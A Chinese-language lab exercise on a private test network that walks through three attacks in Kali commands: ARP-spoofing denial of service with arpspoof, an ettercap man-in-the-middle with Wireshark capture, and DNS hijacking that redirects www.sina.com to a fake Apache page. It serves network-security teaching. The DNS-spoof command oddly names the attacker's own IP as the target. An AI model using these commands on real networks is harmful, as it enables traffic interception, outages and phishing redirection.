攻击机kali IP:192.168.66.136 目标机:192.168.66.129 网关:192.168.66.2
一丶利用Kali arpspoof实现断网攻击
1、先在WINDOWS主机上查看下arp缓存表,得到网关正常的MAC地址。
2、使目标主机192.168.66.129(请修改为自己目标机的IP)断网,192.168.66.2(请修改为自己目标机的网关)为网关。
a.安装arpspoof:
在kali终端输入命令:apt install dsniff
b.在Kali终端输入命令:arpspoof -i eth0 -t 192.168.66.129 192.168.66.2,开始攻击目标机。
3、再次在WINDOWS主机上查看下arp缓存表,得到网关的MAC地址是否变成了KALI的MAC地址。并观察WINDOWS操作系统能否正常浏览网页。
4、在Kali终端输入命令ctrl+C,退出攻击。
任务二:利用Kali ettercap实现中间人攻击
1.使目标主机192.168.66.129(请修改为自己目标机的IP)通过Kali中转上网,所有数据流量通过Kali,网关为192.168.66.2(请修改为自己目标机的网关)。
在Kali终端输入命令:
ettercap -Tq -i eth0 -M arp:remote //192.168.66.129/ //192.168.66.2/
开始攻击目标机。
2.在WINDOWS操作系统命令行ping www.baidu.com;
3.在kali终端输入:wireshark,启动wireshark,并观察是否能捕获到目标机192.168.66.129的ICMP数据包
4.再次在WINDOWS主机上查看下arp缓存表,得到网关的MAC地址是否变成了KALI的MAC地址。
5、在Kali终端输入命令ctrl+C,退出攻击。
任务三:利用Kali ettercap实现DNS劫持
使目标主机192.168.66.129(请修改为自己目标机的IP)访问www.sina.com,访问的是Kali中的虚假网址。
1、使用VI编辑器修改ettercap有关DNS劫持的配置文件/etc/ettercap/etter.dns,在文件末尾增加劫持的DNS项。
www.sina.com A 192.168.66.136(此IP为Kali的IP地址)
备注:VI编辑器的使用
1)在Kali终端中输入vi /etc/ettercap/etter.dns 进入文件
2)在键盘按 i ,进入编辑模式,在etter.dns文件增加www.sina.com A 192.168.66.136(此IP为Kali的IP地址)。
3) 编辑好文件后,按Esc键进入命令模式,在文件中输入 :wq ,然后按enter键退出。
2、修改/var/www/html/ 目录下index.html文件:
echo "JUST kidding!" > /var/www/html/index.html
4、开启Kali的Apache,使Kali能够正常发布网页。
在Kali中输入命令:service apache2 start
在Kali浏览器中输入192.168.66.136观察是否能够正常发布网页
5、进行DNS劫持,在Kali中输入命令:
ettercap -Tq -i eth0 -P dns_spoof -M arp:remote //192.168.66.136/ //192.168.66.2/
开始攻击目标机。
6.在WINDOWS操作系统中使用IE浏览器访问http://www.sina.com,观察访问的网页。
7、在WINDOWS操作系统CMD命令行窗口,ping www.sina.com,观察返回的IP地址是真正的新浪服务器IP,还是Kali的IP。
8、在Kali终端输入命令Ctrl+C,退出攻击。